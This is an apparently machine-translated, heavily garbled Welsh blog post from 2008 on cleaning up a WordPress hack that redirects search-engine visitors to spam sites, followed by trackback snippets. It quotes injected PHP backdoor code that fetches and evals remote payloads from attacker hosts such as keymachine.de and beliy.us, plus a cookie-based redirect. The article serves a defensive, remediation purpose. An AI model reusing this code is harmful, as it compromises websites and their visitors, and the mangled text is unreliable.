WordPress Darnia: Adenill a Atgyweiria Google a Chwilia Beiriant ai Na Cookie Fasnacha Redirected at 'ch - Anghenion.info, AnyResults.Net, 'n Euraid -Info.net a Arall 'n Anghyfreithiol Safleoedd
Hacwyr ydy yn cerdded pawb i maes at darnia a gweithia WordPress blogs hosted ar hyd a lled 'r gwe, yn plannu a yn chwistrellu 'n faleisus chyfundrefn i mewn i WordPress chyfundrefnau a chronfa ddata er redirect hymwelwyr a hits chan Google a arall chwilia beiriannau at spam safleoedd 'n gyfryw fel 'ch - anghenion.info, anyresults.net, 'n euraid -info.net, keymachine.de, beliy.us, seogoogle.us a lawer arall spam safleoedd a llanwedig ag dalu -per - chlecia CPC ads. Rhyw darnia appears at target 'n fwy dyrru at redirecting pawb heb WordPress cookie. Heb been darniedig, hyn fasnacha 'n dybiedig at chyrhaedda 'r blog fel ben taith.
Symptoms chan 'r Chwilia Beiriant Redirection Darnia
Noda a mo pawb symptoms Mai damweinia llwyr. 'na Mai bod yn anad hun drefn chan haciau bodoledig, a cyfranedig at 'n amgen yn cael a 'n bosib benderfyniad.
- Unrhyw chlecia drwo chan chwilia beiriannau 'n gyfryw fel Google, Yahoo, AOL, MSN, Ffenestri Buchedda chwilia canlyniadau, yn cynnwys blog enwa, ewyllysia bod redirected a llwybreiddiedig at hacwyr ’ safleoedd 'n gyfryw fel 'ch - anghenion.info, anyresults.net, 'n euraid -info.net, keymachine.de, beliy.us, seogoogle.us, ag 'r restra si brifio. Viewer arrives am 'r haciwr dudalen ag yr un chwilia linynna a e ai chwiliai i mewn chwilia beiriant.
- Chlecia acha ddolen at 'r blog acha RSS besgi darllenwr 'n gyfryw fel Google darllenwr all bod redirected at haciwr safle hefyd.
- Hymwelwr ag na adla acha 'r blog, ai peidio login ( ymaith ewigod mo has cookie daliedig at 'n faleisus chyfundrefn), ewyllysia bod redirected at spam safleoedd.
- Ond hymweliadau chan chwilia beiriant ydy been redirected ar gerdded, a 'r castia ymdopa at ffola am 'n debygol choelbren chan bloggers, webmasters a safle berchenogion, ai o leiaf addoeda 'r detection chan 'r broblem.
- 'n ddiswta 'n abrwysgl a 'n ddramatig ddefnynna a choll chan massive chod chan hymwelwyr fasnacha a dudalen golygfeydd i mewn gwe tracker ystadegau, 'n arbennig fasnacha ag Google fel referrer, hyd yn oed er chwilia beiriant canlyniadau raning ydy intact.
- Massic ddefnynna chan yn hysbysebu chyllid chan Google AdSense ai arall ads rhwydwaith, ai dadogi ddirprwyaethau.
- 'r yn canlyn base64 encoded PHP chyfundrefn Mai ledrithia acha 'r wp -blog -header.php ffeilia:
<?php
$serefarraygoogle,msn,live,altavista,ask,yahoo,aol,cnn,weather,alexa= (" " " " " " " " " " " " " " " " " " " ");
ser0= foreachseref ($ fel ref) ifstrposstrtolower_SERVER’HTTP_REFERER’,ref ((($ ))!==false) ser1= ”?dorri
ai & & sizeof_COOKIE0 ($)==) headerLocation ( ”: http:/ ”.base64_decodeYW55cmVzdWx0cy5uZXQ. ”= ”) ” / ”) allanfa ? > - Ddelw, sy i mewn ffaith bagad chan 'n faleisus PHP chyfundrefn, adiwyd at 'r wp - chynhwysiad /uploads chyfeiriadur. Er enghraifft, wp - chynhwysiad /uploads /2008 /06 /06 /abcdefghijklmn.jpg, ai bo i mewn 'ch destun folder, fi.e. wp-contents/themes/classic/images/xyz.jpg. 'r enwa chan 'r ddelw Mai bod i mewn 'r fformat chan xxxxxx_old.jpeg.
- Chofnodiad was inserted i mewn MySQL chronfa ddata achos WordPress wp_options at activate 'r ddelw ( 'r 'n faleisus PHP chyfundrefn) fel a plugin, typically fel rss_f541b3abd05e7962fcab37737f40fad8.
- 'na Mai bod hefyd 'n faleisus chyfundrefnau, 'n arbennig hynny a cyfieithedig ag eval ) ai base64_decode ) archa been inserted i mewn i arall WordPress PHP rengau. Enghreifftiau ydy 'r yn canlyn chyfundrefnau:
ifisset_GET'p' (($ ))
sock = @fsockopenkm20725.keymachine.de ( ’ ’, 80)
ifsock ($)
fwrite (sock, ‘GET http: /km20725.keymachine.de / gweinyddwr / dangoseg.php? /aig._SERVER'SERVER_NAME'.p._GET'p'.= ’ ’ &= ’ ’ HTTP /1.0.rn ′ ” ”)
fwrite (sock, ‘Host: km20725.keymachine.de.rnrn ’ ” ”)
whilecontent ($ = fgets ($sock));
content = implode ( ”, content)
@evaltrimsubstrcontent ((($, strposcontent ($, “rnrn ”))))
fclose ($sock);
ifisset_GET'p' (($ )) @eval@file_get_contentshttp (( ’: /beliy.us / gweinyddwr / dangoseg.php? /aig._SERVER'SERVER_NAME'.p._GET'p'= ’ ’ &= ’ ))
ifisset_GET'p' (($ )) @eval@file_get_contentshttp (( ’: /seogoogle.us / gweinyddwr / dangoseg.php? /aig._SERVER'SERVER_NAME'.p._GET'p'= ’ ’ &= ’ ))
evalgzinflatebase64_decode ((( - WordPress destun sy been activated a arferedig all bod chwistrelledig ag yn darnio chyfundrefn a 'n findlws hefyd. 'n gyfryw chyfundrefn normally exists i mewn header.php ai dangoseg.php chan 'r destun, a has bannod cyffelyb i 'r goris
ifser”1″ (== & & sizeof_COOKIE0 ($)==) header”Location :
'r WordPress chwilia fasnacha redirect at spam safle darnia happens 'n debygol o achos ddiogelwch dyllu a vulnerability sy mo 'n glytiog pryd blog berchen decides mo at upgrade at 'n ddiweddara chyfieithiad chan WordPress ( serch rhyw adroddiadau a 'n hwy blogs been darniedig hyd yn oed er 'i ’ eisoes acha 'r 'n ddiweddara chyfieithiad chan WordPress 2.5.1). Whatever 'r achosa, heres ’ 'r atgyweiria a ateb at benderfynu a gorchfyga 'r darnia at cadarnha a addefi bacia 'r fasnacha a arbed been penalized at Google at 'n afresymol redirecting at spam dudalennau.
- Backup 'r WordPress chronfa ddata.
- Arfer phpMyAdmin at bori WordPress MySQL chronfa ddata bordau. Cer at wp_options bord, a 'na baratoi i'r wasg 'r rhwyfa enwedig active_plugins. 'r rhwyfa fanylion pawb 'n esgud plugins a wedi bod activated. Cer drwo 'r restra ( mewn bannod), a chwilia an a plugin enwedig ddibenedig ag ddelw estyniad, 'n gyfryw fel.jpg,.jpeg,.gif a etc. Er enghraifft, abcdefgh_old.jpeg. Noda i lawr 'r llwybr at 'r ddelw ffeilia.
- Yn arfer sFTP ai SSH ( anghofio am FTP ai Telnet achos ddiogelwch), 'na navigate at 'r llwybr chan 'r ffeilia, a ddilea 'r ffeilia.
- Cer at WordPress Administrator Plugins banel, deactivate ai activate unrhyw plugin at amlyma off 'r 'n faleisus plugin chan 'r “active_plugins ” rhwyfa.
- Bacia at phpMyAdmin, am 'r wp_options bord, ca gwanaf a contains 'r yn canlyn linynna fel option_name:
rss_f541b3abd05e7962fcab37737f40fad8Ddilea 'r rhwyfa ar gerdded.
Ai 'ch dont ’ adnabod fel at chyflawna 'r chronfa ddata cleanup detailed i mewn camau goruwch, heres ’ a 'n fideo tutorial:
- Cer at wp_users bord. Ai mae a 'n ddienw ddefnyddiwr (null brisio i mewn user_nicename barc) creedig am 000000:: acha 0000 -00 -00, noda i lawr 'r ddefnyddiwr ID (ID barc, dalm). Ddilea 'r ddefnyddiwr.
- Bori 'r wp_usermeta bord. Leola pawb gwanafau ag user_id hymrysonfeydd 'r ID chan 'r ddileedig 'n anghyfreithiol ddefnyddiwr. Mae normally 'n dri gwanafau been cyfeillachedig at 'r goresgynnwr ddefnyddiwr ID. Ddilea pawb 'r cyfeillachedig gwanafau.
- Login at 'r gweinyddwr at baratoi i'r wasg 'r destun rengau, ai bori 'r destun rengau ’ chyfundrefn i mewn Destun golygydd chan WordPress Administrator arfaetha banel. Atalfa 'r header.php a dangoseg.php achos unrhyw 'n amheugar chyfundrefn. Fel crybwylledig goruwch, chwilia rhywbeth cyffelyb i 'r bannod goris:
ifser”1″ (== & & sizeof_COOKIE0 ($)==) header”Location :Ai sefydla, ddilea a dynnu 'r chyfundrefn. Noda a 'r 'n faleisus chyfundrefn ewyllysia bod 'n amryw banodau ddyhea i mewn chwbl.
- Ai 'i ’ mo eisoes bodoledig, chrea an arllwys dangoseg.html ffeilia i mewn 'r wp - chynhwysiad /plugins chyfeiriadur. 'r 'n syn dangoseg.html chrwyn 'r chynhwysiad chan 'r plugins chyfeiriadur, 'n effeithiol aes beth fewn-blygiau been arferedig chan hacwyr at caleda a dynhau 'r WordPress ddiogelwch.
- Upload a replace pob un a 'n bob WordPress rengau ( mo ond wp -blog -header.php) acha 'r gweinyddwr ag 'r 'n dirf, glanha, a 'n gysefin 'n ddiweddara chyfieithiad chan WordPress (wrth gwrs, eithria hychydig rengau 'n gyfryw fel wp -config.php a destunau). Ai youre ’ upgrading, darllen 'r arwain 'n ddichlyn.
- Chyfnewid 'ch password.
- Ai cei multiple ddefnyddwyr, chyfnewid eiddo password ( ai archa 'u at chyfnewid 'r password) hefyd.
'N BWYSIG: Dyma beiriant cyfieithedig dudalen sy arlwyedig " fel ydy " heb warranty. Beiriant chyfieithiad Mai bod 'n afrwydd at ddeall. Blesio chyfeiria at 'n gysefin Saesneg erthygl whenever 'n bosib.
Ran a chyfranna ai ca 'n dechnegol atega a chyfnertha am 'm 'n Ddigidol Buchedd Forums.
'n gytras Erthyglau
- Integrate a Arddangos Google AdSense achos Chwilia a Co -Op Arfer Chwilia Beiriant Canlyniadau i mewn WordPress Blog Dudalen Batrymlun
- Darnia at Chwilia a Golyga Rhyddha Buchedda Webcam ag Google Chwilia
- Google 'n Feddygol Chwilia Beiriant
- Wikiasari Google Co -op Arfer Chwilia Beiriant, Digg ai StumbleUpon achos Wikipedia?
- Llonaid Chyflea chan Google Chwilia Beiriant Ddygwyl Logo Casgl (1998 2007)
- Replace Google Blog Chwilia ag Technorati achos Incoming Ddolennau i mewn Dashboard chan WordPress
- StatTraq Wordpress Plugin achos Safle Statistic a Fasnacha Chownter
- Chrea Chwilia Beiriant achos Chyfrifiadur ag Copernic 'n Ben-desg Chwilia
- 'n grai Chwilia Beiriant Wikia Chwilia Launched
- Adia a Embed Google Fapiau, Google Checkout a Google Chwilia at Gwe Dudalen 'n Esmwyth ag WebAssist Dreamweaver Celfi achos Google

































Mehefin 12th, 2008 1006:
[... 'm 'n Ddigidol Buchedd WordPress Darnia: Adenill a Atgyweiria Google a Chwilia Beiriant ai Na Cookie Fasnacha Redi …...
Mehefin 12th, 2008 1114:
[... wersja WP 2.5.1 była narażona na jakieś problemy. A w całym tym zamieszaniu, zwanym już Chwilia Beiriant Redirection Darnia, chodzi o przekierowanie ruchu z wyszukiwarek, głównie Google, choć nie tylko, na specjalnie...
Mehefin 12th, 2008 1443:
[... WordPress Darnia: Adenill a Atgyweiria Google a Chwilia Beiriant ai Na Cookie Fasnacha Redirected at 'ch -Nee … Ran ai Anfon Hon at ceraint Chronnell: 'n gytras ContentWant hychwaneg gwe feddalwedd adolygiadau? 'na gwna 'n ddiball danysgrifi at 'n RSS besgi ai ca 'n customizable widget a embed 'i acha 'ch safle! 'n gytras billion WordPress 'r odiaeth arferedig agor darddiad blog feddalwedd...
Mehefin 12th, 2008 1940:
[... Kalau peringkat blog WordPress kita di Google tetap untuk keyword kita, tapi pengunjung turun drastis, hati -hati, bisa jadi itu artinya blog kita kena darnia dan di redirect ke situs spam. [...
Mehefin 13th, 2008 1200:
[... 'm 'n Ddigidol Buchedd WordPress Darnia: Adenill a Atgyweiria Google a Chwilia Beiriant ai Na Cookie Fasnacha Redi …...
Mehefin 13th, 2008 1336:
[... WordPress Darnia: Adenill a Atgyweiria Google a Chwilia Beiriant ai Na Cookie Fasnacha Redirected 'm Digita … WordPress Darnia: Adenill a Atgyweiria Google a Chwilia Beiriant ai Na Cookie Fasnacha Redirected at 'ch - Anghenion.info, AnyResults.Net, 'n Euraid -Info.net a Arall 'n Anghyfreithiol Safleoedd » 'm 'n Ddigidol Buchedd (tags: wordpress ddiogelwch)...
Mehefin 18th, 2008 2208:
[... 'm 'n Ddigidol Buchedd WordPress Darnia: Adenill a Atgyweiria Google a Chwilia Beiriant ai Na Cookie Fasnacha Redi …...
Gorffennaf 3rd, 2008 0308:
[... ca sa -mi dau sema unde e buba, daca nu mi -ar fi spus Eugen intr -o discutie la cafea, ca a gasit un ddolen pe Google si ar fi bine sa -l vad. MyDigitalLife.info, au publicat un articol cu titlul:  ...
Gorffennaf 15th, 2008 0810:
[... Daliais 'i 'n fore acha a made si dynnu pawb 'r 'n faleisus chyfundrefn. Dyma 'n glws tutorial acha fel at glanha 'ch safle ai hon were at damweinia at...
Gorffennaf 17th, 2008 1030:
[... WordPress Darnia: Adenill a Atgyweiria Google a Chwilia Beiriant ai Na Cookie Fasnacha Redirected at 'ch -Nee …. [...
Gorffennaf 25th, 2008 0949:
[... avere una merda d quella tra le mani.Se siete già stati infestati o pensate di esserlo, qui e qui troverete le specifiche dellexploit ’ e alcuni consigli utili per...